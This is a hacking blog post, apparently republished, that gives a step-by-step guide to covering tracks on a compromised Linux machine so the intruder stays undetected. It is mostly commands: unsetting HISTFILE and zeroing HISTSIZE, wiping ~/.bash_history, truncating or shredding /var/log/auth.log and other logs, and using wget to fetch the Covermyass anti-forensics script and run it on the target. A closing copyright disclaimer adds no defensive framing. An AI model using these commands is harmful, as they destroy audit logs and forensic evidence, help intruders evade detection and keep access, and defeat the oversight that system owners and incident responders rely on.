HOW TO Clear the Logs & Bash History on Hacked Linux Systems to Cover Your Tracks & Remain Undetected

Posted by on

 

Clear the Logs & Bash History on Hacked Linux Systems to Cover Your Tracks & Remain Undetected

    by atharva pawar ( hackerz2426k.blogspot.com )



As a hacker, the final stage of exploitation is covering their tracks, which involves wiping all activity and logs so that they can avoid being detected. It's especially crucial for persistence if the target will be accessed again in the future by the attacker.

To show you the basics of covering your tracks, we'll compromise a target first, then explore some techniques used to delete Bash history, clear logs, and remain hidden after exploiting a Linux system. You can check out our Cyber Weapons Lab video below that outlines my guide or skip below to get right to the written steps.

Step 1Compromise a Target

The first thing we need to do is exploit the target. We can use command injection to abuse the way the server handles OS commands to get a shell. We'll also want to upgrade our new shell to a fully interactive one. Doing so will make it easier to work in general, and it will also let us use tab completion and terminal history.

After that, we can escalate our privileges to root so we can better take advantage of the system to remain undetected.

Step 2Create an Easy-to-Delete Hidden Directory

Once we have root access, we can create a hidden directory to work out of and keep any scripts or files in. It won't fool anyone but the most noobie admin, but another layer of discretion certainly couldn't hurt. First, let's locate any writable directories with the following command:

root@target:/# find / -perm -222 -type d 2>/dev/null

/dev/shm
/var/lock
/var/lib/php5
/var/tmp
/var/www/dav
/var/www/twiki/data/Sandbox
/var/www/twiki/data/Main
/var/www/twiki/data/Know
/var/www/twiki/data/TWiki
/var/www/twiki/data/_default
/var/www/twiki/data/Trash
/var/www/twiki/pub/Sandbox
/var/www/twiki/pub/Main
/var/www/twiki/pub/Know
/var/www/twiki/pub/Know/IncorrectDllVersionW32PTH10DLL
/var/www/twiki/pub/TWiki
/var/www/twiki/pub/TWiki/TWikiDocGraphics
/var/www/twiki/pub/TWiki/TWikiTemplates
/var/www/twiki/pub/TWiki/TWikiLogos
/var/www/twiki/pub/TWiki/PreviewBackground
/var/www/twiki/pub/TWiki/FileAttachment
/var/www/twiki/pub/TWiki/WabiSabi
/var/www/twiki/pub/Trash
/var/www/twiki/pub/icn
/tmp
/tmp/.ICE-unix
/tmp/.X11-unix

We can create a hidden directory with the mkdir command and by prepending the name with a dot:

root@target:/# mkdir /dev/shm/.secret

If we list the contents of /dev/shm now, nothing shows up:

root@target:/# ls -l /dev/shm/

total 0

Only when we use the -a switch to list all files and directories does it show up:

root@target:/# ls -la /dev/shm/

total 0
drwxrwxrwt  3 root root    60 2019-06-19 13:49 .
drwxr-xr-x 13 root root 13480 2019-06-19 13:41 ..
drwxr-xr-x  2 root root    40 2019-06-19 13:49 .secret

And to remove the directory once we are finished on the machine, use the rmdir command:

root@target:/# rmdir /dev/shm/.secret/

Step 3Delete the Bash History

Bash keeps a list of commands used in the current session in memory, so it's important to clear it to cover your tracks. We can view the current history with the history command:

root@target:/# history

    1  cd /
    2  ls
    3  find / -perm -222 -type d 2>/dev/null
    4  cd /dev/shm/
    5  cd /
    6  mkdir /dev/shm/.secret
    7  ls -l /dev/shm/
    8  ls -la /dev/shm/
    9  ls
   10  rmdir /dev/shm/.secret/
   11  history

Commands are written to the HISTFILE environment variable, which is usually .bash_history. We can echo it to see the location:

root@target:/# echo $HISTFILE

/root/.bash_history

We can use the unset command to remove the variable:

root@target:/# unset HISTFILE

So when we echo it again, nothing shows up:

root@target:/# echo $HISTFILE

We can also make sure the command history isn't stored by sending it to /dev/null. Set the variable to it:

root@target:/# HISTFILE=/dev/null

Or do the same with the export command:

root@target:/# export HISTFILE=/dev/null

And the history will now be sent to /dev/null (nowhere):

root@target:/# echo $HISTFILE

/dev/null

We can set the number of commands to be stored during the current session to 0 using the HISTSIZE variable:

root@target:/# HISTSIZE=0

Alternatively, use the export command:

root@target:/# export HISTSIZE=0

We can also change the number of lines allowed in the history file using the HISTFILESIZE variable. Set this to 0:

root@target:/# HISTFILESIZE=0

Or with export:

root@target:/# export HISTFILESIZE=0

The set command can be used to change shell options as well. To disable the history option, use the following command:

root@target:/# set +o history

And to enable it again:

root@target:/# set -o history

Similarly, the shopt command can be used to change shell options. To disable history, use the following command:

root@target:/# shopt -ou history

And to enable it again:

root@target:/# shopt -os history

While running commands on the target system, we can sometimes avoid saving them to history by starting the command with a leading space:

root@target:~#  cat /etc/passwd

That technique doesn't work all the time and depends on the system.

We can also just clear the history using the -c switch:

root@target:~# history -c

To make sure the changes are written to disk, use the -w switch:

root@target:~# history -w

That will only clear the history for the current session. To absolutely make sure the history is cleared when exiting a session, the following command comes in handy:

root@target:/# cat /dev/null > ~/.bash_history && history -c && exit

We can also use the kill command to exit the session without saving history:

root@target:/# kill -9 $$

Step 4Clear the Log Files

In addition to Bash history, log files also need to be wiped to remain undetected. Here are some common log files and what they contain:

  • /var/log/auth.log Authentication
  • /var/log/cron.log Cron Jobs
  • /var/log/maillog Mail
  • /var/log/httpd Apache

Of course, we can simply remove a log with the rm command:

root@target:/# rm /var/log/auth.log

But that will likely raise red flags, so it's better to empty the file rather than erase it completely. We can use the truncate command to shrink the size to 0:

root@target:/# truncate -s 0 /var/log/auth.log

Please note, truncate is not always present on all systems.

We can accomplish the same thing by echoing nothing into the file:

root@target:/# echo '' > /var/log/auth.log

And also with > by itself to empty the file:

root@target:/# > /var/log/auth.log

We can also send it to /dev/null:

root@target:/# cat /dev/null > /var/log/auth.log

Or use the tee command:

root@target:/# true | tee /var/log/auth.log

We can also use the dd command to write nothing to the log file:

root@target:/# dd if=/dev/null of=/var/log/auth.log

0+0 records in
0+0 records out
0 bytes (0 B) copied, 6.1494e-05 s, 0.0 kB/s

The shred command can be used to overwrite a file with meaningless binary data:

root@target:/# shred /var/log/auth.log

We can even tack on -zu which will truncate the file and overwrite it with zeros to hide evidence of shredding:

root@target:/# shred -zu /var/log/auth.log

Step 5Use a Tool to Ensure Things Are Erased

To increase the chances that any activity on the target goes undiscovered, we can use a tool to make sure everything gets erased. Covermyass is a script that will automate much of the processes we've already covered, including clearing log files and disabling Bash history.

We can grab the script from GitHub using wget (assuming we have access to the internet on the target, otherwise, it will have to be transferred manually):

root@target:/# wget https://raw.githubusercontent.com/sundowndev/covermyass/master/covermyass

Head to a writable directory, and use chmod to make it executable:

root@target:/tmp# chmod +x covermyass

Then we can run it:

root@target:/tmp# ./covermyass

Welcome to Cover my ass tool !

Select an option :

1) Clear logs for user root
2) Permenently disable auth & bash history
3) Restore settings to default
99) Exit tool

>

We're given a custom prompt with a few options to choose from. Let's select the first one to clear the logs:

> 1

[+] /var/log/messages cleaned.
[+] /var/log/auth.log cleaned.
[+] /var/log/kern.log cleaned.
[+] /var/log/wtmp cleaned.
[+] ~/.bash_history cleaned.
[+] History file deleted.

Reminder: your need to reload the session to see effects.
Type exit to do so.

We can also disable Bash and auth history with option 2:

> 2

[+] Permanently sending /var/log/auth.log to /dev/null
[+] Permanently sending bash_history to /dev/null
[+] Set HISTFILESIZE & HISTSIZE to 0
[+] Disabled history library

Permenently disabled bash log.

And in case you need to clear everything in a hurry, simply append now to the command:

root@target:/tmp# ./covermyass now

[+] /var/log/messages cleaned.
[+] /var/log/kern.log cleaned.
[+] /var/log/wtmp cleaned.
[+] ~/.bash_history cleaned.
[+] History file deleted.

Reminder: your need to reload the session to see effects.
Type exit to do so.

Wrapping Up

Today, we explored various techniques used to cover tracks and remain undetected on a compromised machine. We covered ways to disable and delete Bash history, methods to clear log files, and utilized the Covermyass tool to ensure our activity on the target was wiped. There are other ways to clear certain traces of an attack, like using Metasploitusing shell scripting, or doing it on a hacked Windows machine, but the above should be everything you need for a basic Linux computer.

If you like our content subscribe , thank you !

Copyright Disclaimer under section 107 of the Copyright Act 1976, allowance is made for “fair use” for purposes such as criticism, comment, news reporting, teaching, scholarship, education and research.

Fair use is a use permitted by copyright statute that might otherwise be infringing. 

Non-profit, educational or personal use tips the balance in favor of fair use. 

One of the rights accorded to the owner of copyright is the right to reproduce or to authorize others to reproduce the work in copies or phonorecords.  This right is subject to certain limitations found in sections 107 through 118 of the copyright law (title 17, U.S. Code).  One of the more important limitations is the doctrine of “fair use”.  The doctrine of fair use has developed through a substantial number of court decisions over the years and has been codified in section 107 of the copyright law. 

Section 107 contains a list of the various purposes for which the reproduction of a particular work may be considered fair, such as criticism, comment, news reporting, teaching, scholarship, and research.  Section 107 also sets out in four factors to be considered in determining whether or not a particular use is fair: 

1. The purpose and character of the use, including whether such use is of commercial nature or is for nonprofit educational purposes

2. The nature of the copyrighted work

3. The amount and substantiality of the portion used in relation to the copyrighted work as a whole

4. The effect of the use upon the potential market for, or value of, the copyrighted work

The distinction between fair use and infringement may be unclear and not easily defined. There is no specific number of words, lines, or notes that may safely be taken without permission. Acknowledging the source of the copyrighted material does not substitute for obtaining permission.

The 1961 Report of the Register of Copyrights on the General Revision of the U.S. Copyright Law cites examples of activities that courts have regarded as fair use: “quotation of excerpts in a review or criticism for purposes of illustration or comment; quotation of short passages in a scholarly or technical work, for illustration or clarification of the author’s observations; use in a parody of some of the content of the work parodied; summary of an address or article, with brief quotations, in a news report; reproduction by a library of a portion of a work to replace part of a damaged copy; reproduction by a teacher or student of a small part of a work to illustrate a lesson; reproduction of a work in legislative or judicial proceedings or reports; incidental and fortuitous reproduction, in a newsreel or broadcast, of a work located in the scene of an event being reported.”

Copyright protects the particular way an author has expressed himself. It does not extend to any ideas, systems, or factual information conveyed in the work.

The safest course is always to get permission from the copyright owner before using copyrighted material. The Copyright Office cannot give this permission.

When it is impracticable to obtain permission, use of copyrighted material should be avoided unless the doctrine of fair use would clearly apply to the situation. The Copyright Office can neither determine if a certain use may be considered fair nor advise on possible copyright violations. If there is any doubt, it is advisable to consult an attorney.

FL-102, Revised September 2010

Comments

Post a Comment